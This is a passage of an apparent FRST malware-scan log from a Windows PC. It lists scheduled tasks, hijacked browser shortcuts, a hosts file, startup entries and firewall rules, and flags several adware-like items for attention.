Task: {FB119739-D5B0-4725-B8A1-6684820F96FB} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {FC48FBF3-30B8-44A9-9A0B-C568A2FC47CD} - \LuckyTab -> No File <==== ATTENTION
Task: {FC5FE3D1-68A5-4CAD-84FC-0A61139E9C31} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\BJZJKCUBLH1.job => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge (2).lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,"
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a41ce5b91aa3166e\MightyText - SMS from PC & Text from Computer.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-07-09 23:33 - 2015-07-09 23:33 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-09-23 20:35 - 2015-12-29 12:12 - 00019640 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-12-09 04:52 - 2015-11-25 00:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-09 04:51 - 2015-11-25 00:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-09 04:52 - 2015-11-25 00:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-09 23:13 - 2015-09-10 01:08 - 00210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2009-12-10 04:39 - 2008-09-19 04:03 - 00167936 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\LIBPQ.dll
2009-02-12 20:01 - 2006-11-06 19:18 - 00963584 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\libxml2.dll
2005-07-20 06:48 - 2005-07-20 07:48 - 00059904 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\zlib1.dll
2008-02-04 22:43 - 2008-02-04 23:43 - 00027136 _____ () C:\Program Files (x86)\PostgreSQL\8.3\lib\plugins\plugin_debugger.dll
2016-02-10 21:59 - 2016-02-10 21:59 - 00170496 _____ () C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\IsdiInterop\c77312f309b32c7ba095241bb8fa6749\IsdiInterop.ni.dll
2010-06-18 01:06 - 2010-04-13 12:52 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mbamchameleon => ""="Driver"
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-19 13:15 - 2016-03-11 19:16 - 00000967 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-470165136-1162808608-978993673-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\RoNiN\Desktop\Pics\Taxi Driver Cinespia.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: ) (ConsentPromptBehaviorUser: ) (EnableLUA: )
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: 1198E835-A0AB-4C55-9629-D16AFAD406CB => 3
MSCONFIG\Services: 93530252-4B7E-48FF-9DAA-4D90DB571BBB => 3
MSCONFIG\Services: ACDaemon => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: APNMCP => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: AppxikenoZ => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: BrsHelper => 2
MSCONFIG\Services: btwdins => 2
MSCONFIG\Services: CLDTVHNService => 2
MSCONFIG\Services: CloudPrinter => 2
MSCONFIG\Services: CltMngSvc => 2
MSCONFIG\Services: Dataup => 2
MSCONFIG\Services: dojygici => 2
MSCONFIG\Services: Ejuvde => 2
MSCONFIG\Services: ETDService => 2
MSCONFIG\Services: FirebirdServerMAGIXInstance => 3
MSCONFIG\Services: Gambali => 2
MSCONFIG\Services: groover110320162257 Updater => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: IntuitUpdateServiceV4 => 2
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: Jhfuy => 2
MSCONFIG\Services: kBTNrls => 2
MSCONFIG\Services: McciCMService => 2
MSCONFIG\Services: McciCMService64 => 2
MSCONFIG\Services: MPCProtectService => 
MSCONFIG\Services: mwrc => 2
MSCONFIG\Services: Nijgatfy => 2
MSCONFIG\Services: NvNetworkService => 2
MSCONFIG\Services: NvStreamSvc => 2
MSCONFIG\Services: nvsvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: Service Mgr FindSearchWindow => 2
MSCONFIG\Services: shopperz130320161459 Updater => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SMUpd => 2
MSCONFIG\Services: SPBIUpd => 2
MSCONFIG\Services: ss_conn_service => 2
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: Update Mgr FindSearchWindow => 2
MSCONFIG\Services: wdsvc => 2
MSCONFIG\Services: wrc => 2
MSCONFIG\Services: wucotusy => 2
MSCONFIG\Services: wugixojyzbt => 2
MSCONFIG\Services: YahooAUService => 2
MSCONFIG\Services: zigipyro => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk => C:\windows\pss\Microsoft Office.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Amazon Music => "C:\Users\RoNiN\AppData\Local\Amazon Music\Amazon Music Helper.exe"
MSCONFIG\startupreg: ApplePhotoStreams => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
MSCONFIG\startupreg: AppleSyncNotifier => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: ArcSoft Connection Service => C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
MSCONFIG\startupreg: Bing Bar => "C:\Program Files (x86)\MSN Toolbar\Platform\5.0.1423.0\mswinext.exe"
MSCONFIG\startupreg: BitTorrent => "C:\Users\RoNiN\AppData\Roaming\BitTorrent\BitTorrent.exe"  /MINIMIZED
MSCONFIG\startupreg: com.apple.dav.bookmarks.daemon => C:\Program Files (x86)\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: HP Photosmart 6510 series (NET) => "C:\Program Files\HP\HP Photosmart 6510 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN1852217505QB:NW" -scfn "HP Photosmart 6510 series (NET)" -AutoStart 1
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: Live Update 5 => C:\Program Files (x86)\MSI\Live Update 5\BootStartLiveupdate.exe /reminder
MSCONFIG\startupreg: Microsoft Default Manager => "C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume
MSCONFIG\startupreg: Nikon Message Center 2 => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe -s
MSCONFIG\startupreg: NvBackend => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
MSCONFIG\startupreg: PCShowServer => "C:\Users\RoNiN\AppData\Local\DIRECTV Player\PCShowServerPMWrapper.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: ShadowPlay => C:\windows\system32\rundll32.exe C:\windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
MSCONFIG\startupreg: SkyDrive => "C:\Users\RoNiN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe" /background
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: TkBellExe => "C:\Users\RoNiN\update\realsched.exe"  -osboot
MSCONFIG\startupreg: TomTomHOME.exe => "C:\Program Files (x86)\TomTom HOME 2\TomTomHOMERunner.exe"
MSCONFIG\startupreg: UpdReg => C:\windows\UpdReg.EXE
HKLM\...\StartupApproved\StartupFolder: => "bsod.hta"
HKLM\...\StartupApproved\StartupFolder: => "AllPCoptimizer.exe.lnk"
HKLM\...\StartupApproved\StartupFolder: => "WebBrowserMixVideoPlayer.lnk"
HKLM\...\StartupApproved\Run: => "THXCfg64"
HKLM\...\StartupApproved\Run: => "IDSCPRODUCT"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "IAStorIcon"
HKLM\...\StartupApproved\Run32: => "TkBellExe"
HKLM\...\StartupApproved\Run32: => "CitrixReceiver"
HKLM\...\StartupApproved\Run32: => "Rt45"
HKLM\...\StartupApproved\Run32: => "BSOD"
HKLM\...\StartupApproved\Run32: => "QwaT1"
HKLM\...\StartupApproved\Run32: => "QwaT4"
HKLM\...\StartupApproved\Run32: => "QwaT5"
HKLM\...\StartupApproved\Run32: => "QwaTgg"
HKLM\...\StartupApproved\Run32: => "QwaT22"
HKLM\...\StartupApproved\Run32: => "QwaT55"
HKLM\...\StartupApproved\Run32: => "QwaT21"
HKLM\...\StartupApproved\Run32: => "QwaT78"
HKLM\...\StartupApproved\Run32: => "QwaT"
HKLM\...\StartupApproved\Run32: => "Rty01"
HKLM\...\StartupApproved\Run32: => "cpx"
HKLM\...\StartupApproved\Run32: => "Rt562@"
HKLM\...\StartupApproved\Run32: => "mpck_en_005030264"
HKLM\...\StartupApproved\Run32: => "msrtn32"
HKLM\...\StartupApproved\Run32: => "ospd_us_037010264"
HKLM\...\StartupApproved\Run32: => "SPDriver"
HKLM\...\StartupApproved\Run32: => "rec_en_222"
HKLM\...\StartupApproved\Run32: => "rec_en_224"
HKLM\...\StartupApproved\Run32: => "rst"
HKLM\...\StartupApproved\Run32: => "sun13"
HKLM\...\StartupApproved\Run32: => "TV"
HKLM\...\StartupApproved\Run32: => "win_en_77"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "Storm Alerts.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "StormAlertsApp.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "SideSync"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "wdbext"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "Windi"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{DCB933B0-7F4D-454F-AC6A-1E854FAE7247}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{9A607EBD-98B0-4DF0-8832-162C6520DD96}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{C2050471-EF7B-454E-BAD7-031B8C799034}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{26946E3E-72F1-4A5C-928D-74383A9063F6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{BB357A36-3CB3-42AA-9482-3F82B3FBF5B6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{F5A9A71E-E542-4B60-AC88-407CF349333D}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{6DFDF484-35F7-4560-806F-3D534DDC2B99}] => (Allow) C:\Program Files (x86)\SmileFiles\downloader.exe
FirewallRules: [{89BB93BD-D481-4B92-B90D-3BE936589FAE}] => (Allow) C:\Program Files (x86)\SmileFiles\downloader.exe
FirewallRules: [{5A121057-400D-4F36-8298-4F9AF137952B}] => (Allow) C:\Program Files (x86)\SmileFiles\SmileFiles.exe
FirewallRules: [{3E527C67-8AFB-4CE0-8CE4-B6A32ABC7746}] => (Allow) C:\Program Files (x86)\SmileFiles\SmileFiles.exe
FirewallRules: [{81FF04D0-1773-4D9A-B5C8-968B7598EB18}] => (Allow) C:\Users\RoNiN\AppData\Local\Temp\Temp2_Adobe_Captivate_-_8_keymaker.zip\Adobe_Captivate_-_8_keymaker.exe
FirewallRules: [{9F08737F-5B12-4519-92BF-D00087D34BB5}] => (Allow) C:\Users\RoNiN\AppData\Local\Temp\Temp2_Adobe_Captivate_-_8_keymaker.zip\Adobe_Captivate_-_8_keymaker.exe
FirewallRules: [{BB182CB8-8875-4B4D-9B6D-F473006EE41C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{5FDCDFBB-4E64-4094-9759-EE002B6FFE85}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{84B7E979-84E3-4C39-A80B-BD495552BF32}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{1DDD067C-DEBB-4C88-B5D4-D745459DD54D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{7B1D4FC6-DA08-4C98-8AFA-1334AD39B3D2}] => (Allow) C:\Users\RoNiN\AppData\Local\Temp\nsv3E49.tmp\CnetInstaller-10858997.exe
FirewallRules: [{C717ECD5-2072-4B28-AB16-A10FE79A6747}] => (Allow) C:\Users\RoNiN\AppData\Local\Temp\nsv3E49.tmp\CnetInstaller-10858997.exe
FirewallRules: [{A63643D2-7DB5-45C0-815B-0BC12A98D7DB}] => (Allow) C:\Users\RoNiN\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{FAF34DC7-FE08-41E6-B320-A00C22ADF40A}] => (Allow) C:\Users\RoNiN\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{BA9DADD6-12A8-4990-84DA-ECA69E4AA620}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{CA37E765-C7C0-4281-A08F-8FBDCDE18C87}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{89BF33C2-1135-4A44-9001-EAEE8DB8C080}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{61DF9056-88E2-4465-8B1E-17205E0B3AD9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{9274EE06-3B2C-469C-AC6B-8B3E4A10C4F3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{35EF7245-A384-4B7E-9B89-637569982991}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{B977E4D9-F7AC-45A2-B90D-5DDF575DB3BA}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [UDP Query User{7C597374-95E2-4417-A87A-71B539C01019}C:\program files (x86)\skifta\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\skifta\jre\bin\javaw.exe
FirewallRules: [TCP Query User{9788F4B3-41F7-4EA5-B1E2-D19F666BA212}C:\program files (x86)\skifta\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\skifta\jre\bin\javaw.exe
FirewallRules: [{E248708E-EA33-4BF1-A171-A713ADDD2941}] => (Allow) C:\Program Files (x86)\DirecTV\DirecTV\Kernel\CLML\VDTVRec.exe
FirewallRules: [{65210182-2E03-4646-BBD6-9F96C2918788}] => (Allow) C:\Program Files (x86)\DirecTV\DirecTV\VDTV.exe
FirewallRules: [{F1CC8CBC-6754-4E6A-99A0-F76940155FCA}] => (Allow) C:\Program Files (x86)\DirecTV\DirecTV\DIRECTV2PC™.exe
FirewallRules: [UDP Query User{2DE0EB4D-0CA1-455B-A108-E0E24BFD44D3}C:\users\ronin\appdata\local\directv player\ndspcshowserver.exe] => (Allow) C:\users\ronin\appdata\local\directv player\ndspcshowserver.exe
FirewallRules: [TCP Query User{B68FF020-2C6B-4B79-8D45-0DC50FC42D25}C:\users\ronin\appdata\local\directv player\ndspcshowserver.exe] => (Allow) C:\users\ronin\appdata\local\directv player\ndspcshowserver.exe
FirewallRules: [UDP Query User{AFD0A82C-C4E1-4E73-90C0-07802FC353B5}C:\program files (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [TCP Query User{598AD19C-0B0E-445B-BB74-0880AFE78AED}C:\program files (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{D3F472F7-4BC3-4FE8-9A87-D9BA9CB10426}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [TCP Query User{69B5A1AB-8D48-493A-9CE5-921246FF99B5}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [{C14CC1E9-D19E-445F-B5A4-CF287A85B2CD}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe
FirewallRules: [{40387BB8-F0FE-42C1-A9BF-5055B9101901}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe
FirewallRules: [{E8C806F4-FCF2-4D38-96BB-E79901D6BF50}] => (Allow) C:\Users\RoNiN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [UDP Query User{E5F5F020-2D99-4CCC-B65D-967BE23F08C9}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{B460AF68-0916-4A9D-845A-A4B0616D9390}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{37444A00-F2A0-41C0-9FA9-826095DE3B32}C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe] => (Allow) C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe
FirewallRules: [TCP Query User{DE6ED13C-B642-4492-BDC8-0E5DB99C1E00}C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe] => (Allow) C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe
FirewallRules: [UDP Query User{4C7104F5-63FB-438C-823D-A35A400624B0}C:\ubisoft\ghost recon online\ncsa-live\ghostrecononline.exe] => (Allow) C:\ubisoft\ghost recon online\ncsa-live\ghostrecononline.exe
FirewallRules: [TCP Query User{E114CBFB-489F-4CF7-A7FE-D25369C364E9}C:\ubisoft\ghost recon online\ncsa-live\ghostrecononline.exe] => (Allow) C:\ubisoft\ghost recon online\ncsa-live\ghostrecononline.exe
FirewallRules: [UDP Query User{E71F51CE-C614-4210-8EAB-E66DA6406E71}C:\users\ronin\appdata\local\apps\2.0\w8a6hk1p.jzq\cbm5w0jt.va0\laun...app_59711684aa47878d_0001.001b_6f29478cafd19413\launcher.exe] => (Allow) C:\users\ronin\appdata\local\apps\2.0\w8a6hk1p.jzq\cbm5w0jt.va0\laun...app_59711684aa47878d_0001.001b_6f29478cafd19413\launcher.exe
FirewallRules: [TCP Query User{8AA57984-68B3-45DC-8119-097D6F88D2B9}C:\users\ronin\appdata\local\apps\2.0\w8a6hk1p.jzq\cbm5w0jt.va0\laun...app_59711684aa47878d_0001.001b_6f29478cafd19413\launcher.exe] => (Allow) C:\users\ronin\appdata\local\apps\2.0\w8a6hk1p.jzq\cbm5w0jt.va0\laun...app_59711684aa47878d_0001.001b_6f29478cafd19413\launcher.exe
FirewallRules: [{5E956ABE-03F0-40F0-B5FD-A72327901ECB}] => (Allow) C:\Program Files\HP\HP Photosmart 6510 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{DBE93BD7-16AE-4F98-8258-2527D6470650}] => (Allow) C:\Program Files\HP\HP Photosmart 6510 series\Bin\DeviceSetup.exe
FirewallRules: [{089AD9AE-AC83-406D-9990-40CFFB6A2530}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{C5B9CBB7-FE93-4953-9BDA-18EB5FB1CEC3}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{28027EB1-3CD1-4AB9-9181-D5BE253524A3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{60462D02-9714-4CAC-B848-189CF26E9EE6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{48094F2A-771F-461B-9BD5-8B359CAFA391}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{3F8CF68A-FABB-42CD-81A0-BB6DECC7CB42}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [UDP Query User{C7C2327C-D3C1-41C5-AB41-DEE0EEC21AAA}C:\users\ronin\desktop\xbins.exe] => (Allow) C:\users\ronin\desktop\xbins.exe
FirewallRules: [TCP Query User{E438E8F6-1BE1-467A-A785-C0CB554B86A5}C:\users\ronin\desktop\xbins.exe] => (Allow) C:\users\ronin\desktop\xbins.exe
FirewallRules: [UDP Query User{E596C476-1196-40F8-BFE6-B824FE54A20B}C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe] => (Allow) C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe
FirewallRules: [TCP Query User{C7758164-0B81-4791-889E-300E02DDD3A1}C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe] => (Allow) C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe
FirewallRules: [{2D65E536-5186-4C6E-9096-F61DA03C28C7}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{B0809214-275E-4E04-90A3-D518576DC9B1}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{561A074B-345A-4717-95D2-2E76E4E1F07E}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{56D831B4-E1DA-46C5-AEBA-E99CF56D64C5}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{24AEF387-0CDA-424A-8BF0-C2BA9883AB8E}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe
FirewallRules: [{EB7139D0-3153-4828-9815-172088552B9C}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe
FirewallRules: [UDP Query User{7392B614-972A-4972-B8F8-28749440D789}C:\program files (x86)\google\google earth\plugin\geplugin.exe] => (Allow) C:\program files (x86)\google\google earth\plugin\geplugin.exe
FirewallRules: [TCP Query User{DDA9B4CD-3DF1-4469-B3FE-070EF7A86EC6}C:\program files (x86)\google\google earth\plugin\geplugin.exe] => (Allow) C:\program files (x86)\google\google earth\plugin\geplugin.exe
FirewallRules: [UDP Query User{34E14A01-F9E8-4267-8EA7-E3C3B20793D1}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
